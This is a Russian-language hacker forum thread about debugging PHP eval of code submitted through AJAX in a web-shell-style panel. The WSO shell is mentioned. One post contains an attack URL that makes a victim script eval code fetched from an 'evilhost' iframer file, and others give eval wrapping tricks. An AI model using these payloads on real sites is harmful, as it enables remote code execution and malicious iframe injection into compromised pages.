Eval и большие объемы кода

[EnDoR]

Цитата:

Сообщение от Pashkela

$_POST['code'] у тебя дикая хрень, закрывай тему и учи php

ЗАКОН: Всё, что сработает из обычного отдельного файла, сработает и в Execution PHP-code в wso, только без <? в начале

На самом деле Вы поторопились с выводами))Код полностью рабочий...

[Pashkela]

Братан, если у тебя работает phpinfo, то и ЛЮБОЙ другой код (тем более тот, что ты скинул в личку), будет работать, если его написть ПРАВИЛЬНО. Советую отталкиваться от этого

[EnDoR]

Согласен,что ситуация парадоксальна...Вообщем сниму я видео и сами всё увидите=)выложу послезавтра примерно

[Pashkela]

Цитата:

Согласен,что ситуация парадоксальна

пародоксальны твои выводы, ситуация-то как раз обычная) Просто следуй логике. А вообще молодец, хорошая эмпатия

[Ereeee]

http://victimhost/badscript.php?code=eval(file_get_contents('http://evilhost/iframer.txt'));

[m0Hze]

Были проблему подобного хакактера, только у меня все это дело еще и в base64 было. При евле ругался то на Т_СПЕЙС, то на $end. Помогло добавление '?>' к евалу, и '<?php' к самому коду + перевод всего кода в другую кодировку. Вот не могу только вспомнить, то ли в UTF-8 из вин перегонял, толи обратно. Но как факт - заработало)

[DrakonHaSh]

была как то проблема, возможно сходная с проблемой ТС и m0Hze.
выкрутился так:
eval("?><?php ".$code." ?>");

[EnDoR]

Ребят,вообщем проблема после ряда экспериментов и отладочных работ всё-таки прояснилась...не знаю каким образом,но дело оказалось в ajax!Сделал через document.formname.submit(),правда с перезагрузкой страницы и теперь всё пашет...

Вообще очень интересный момент,что при ajax некоторые коды успешно проходят eval,а другие же-нет!
Мне кажется,что дело как-то связано с getelementbyid,но вообще точно неясно.
Вот пример бажного кода,что-то проходило eval,а что-то нет!Вообщем вот:

PHP код:

function stat(){
        
    var checkBoxs = [];

    elems = document.getElementsByTagName('input');
    for (i=0;i<elems.length;i++){
        if (elems[i].type == 'checkbox'){
            if (elems[i].checked) {
           checkBoxs.push(elems[i].value);
            }
        }
    }    
   var x=document.getElementById('Code').value;
   
   xhttp=new XMLHttpRequest();
   xhttp.onreadystatechange=function(){
      if (xhttp.readyState==4 && xhttp.status==200)
         document.getElementById('ajax').innerHTML=xhttp.responseText;
      }
   xhttp.open('POST','exer.php',true);
   xhttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
   var str='do=exec&code='+x+'&id='+checkBoxs.join();
   xhttp.send(str);
} 


Когда начинал писать код,то про jquery имел самые смутные представления,теперь такой длинный код уже не пишу,а использую jquery.Замечательная вещь между прочим,раньше думал что на php что угодно могу написать и хватит,а теперь понял,что ошибался=)Javascript очень мощный язык...
На этой ноте тему можно за-кры-вать!=)

[chupakabra]

Цитата:

var str='do=exec&code='+x+'&id='+checkBoxs.join();

urlencode надо делать (escape() / encodeURI() / encodeURIComponent())

[EnDoR]

Цитата:

Сообщение от chupakabra

urlencode надо делать (escape() / encodeURI() / encodeURIComponent())

Поставил escape() и теперь в ajax-режиме тоже заработало.Спасибо большое,chupakabra!

P.S И опыт-сын ошибок трудных=)